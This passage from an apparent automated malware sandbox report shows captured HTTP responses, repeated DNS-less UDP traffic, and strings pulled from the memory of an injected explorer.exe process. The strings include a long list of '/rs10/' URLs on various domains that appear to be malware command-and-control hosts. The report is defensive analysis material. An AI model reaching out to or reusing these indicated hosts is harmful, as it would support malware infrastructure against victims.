65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f Data Ascii: <!DOCTYPE html><!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--><!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--><!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--><!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--><head><title>Attention Required! | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="no
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Tue, 24 Oct 2023 06:31:16 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: explorer.exe, 00000003.00000002.3804772422.00000000087DE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083531825.00000000087DE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1325855618.0000000006A6C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1327499164.00000000087DE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083080171.0000000006A7B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3802070470.0000000006A7E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
          Source: explorer.exe, 00000003.00000002.3804772422.00000000087DE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083531825.00000000087DE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1325855618.0000000006A6C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1327499164.00000000087DE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083080171.0000000006A7B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3802070470.0000000006A7E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
          Source: explorer.exe, 00000003.00000002.3804772422.00000000087DE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083531825.00000000087DE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1325855618.0000000006A6C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1327499164.00000000087DE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083080171.0000000006A7B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3802070470.0000000006A7E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
          Source: explorer.exe, 00000003.00000002.3804772422.00000000087DE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083531825.00000000087DE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1325855618.0000000006A6C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1327499164.00000000087DE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083080171.0000000006A7B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3802070470.0000000006A7E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
          Source: explorer.exe, 00000003.00000002.3800695222.0000000006A6C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3084477649.0000000006A6C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1325855618.0000000006A6C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
          Source: explorer.exe, 00000003.00000002.3797222750.00000000027F0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1327213978.0000000007F70000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1326487164.0000000007320000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
          Source: explorer.exe, 00000003.00000000.1325855618.0000000006A6C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2193101829.0000000006AD5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.calm-plants.com
          Source: explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.calm-plants.com/rs10/
          Source: explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.calm-plants.com/rs10/www.hdlive7.live
          Source: explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.calm-plants.comReferer:
          Source: explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cleaning-products-29334.bond
          Source: explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cleaning-products-29334.bond/rs10/
          Source: explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cleaning-products-29334.bond/rs10/www.calm-plants.com
          Source: explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cleaning-products-29334.bondReferer:
          Source: explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cryptarrow.com
          Source: explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cryptarrow.com/rs10/
          Source: explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cryptarrow.com/rs10/www.starryallure.com
          Source: explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cryptarrow.comReferer:
          Source: explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.fhstbanknigeria.com
          Source: explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.fhstbanknigeria.com/rs10/
          Source: explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.fhstbanknigeria.com/rs10/www.m-baer.com
          Source: explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.fhstbanknigeria.comReferer:
          Source: explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.guillaumecarreau.com
          Source: explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.guillaumecarreau.com/rs10/
          Source: explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.guillaumecarreau.com/rs10/www.omarshafie.online
          Source: explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.guillaumecarreau.comReferer:
          Source: explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hdlive7.live
          Source: explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hdlive7.live/rs10/
          Source: explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hdlive7.live/rs10/www.guillaumecarreau.com
          Source: explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hdlive7.liveReferer:
          Source: explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.m-baer.com
          Source: explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.m-baer.com/rs10/
          Source: explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.m-baer.com/rs10/www.rewmio.xyz
          Source: explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.m-baer.comReferer:
          Source: explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mtauratarnt.com
          Source: explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mtauratarnt.com/rs10/
          Source: explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mtauratarnt.com/rs10/www.robertjamesfineclothing.com
          Source: explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mtauratarnt.comReferer:
          Source: explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.nightoracle.com
          Source: explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.nightoracle.com/rs10/
          Source: explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.nightoracle.com/rs10/www.mtauratarnt.com
          Source: explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.nightoracle.comReferer:
          Source: explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.omarshafie.online
          Source: explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.omarshafie.online/rs10/
          Source: explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.omarshafie.onlineReferer:
          Source: explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.rewmio.xyz
          Source: explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.rewmio.xyz/rs10/
          Source: explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.rewmio.xyz/rs10/www.totalkfood.com
          Source: explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.rewmio.xyzReferer:
          Source: explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.robertjamesfineclothing.com
          Source: explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.robertjamesfineclothing.com/rs10/
          Source: explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.robertjamesfineclothing.com/rs10/www.cleaning-products-29334.bond
          Source: explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.robertjamesfineclothing.comReferer:
          Source: explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.roundaboutlogistics.com
          Source: explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.roundaboutlogistics.com/rs10/
          Source: explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.roundaboutlogistics.com/rs10/www.nightoracle.com
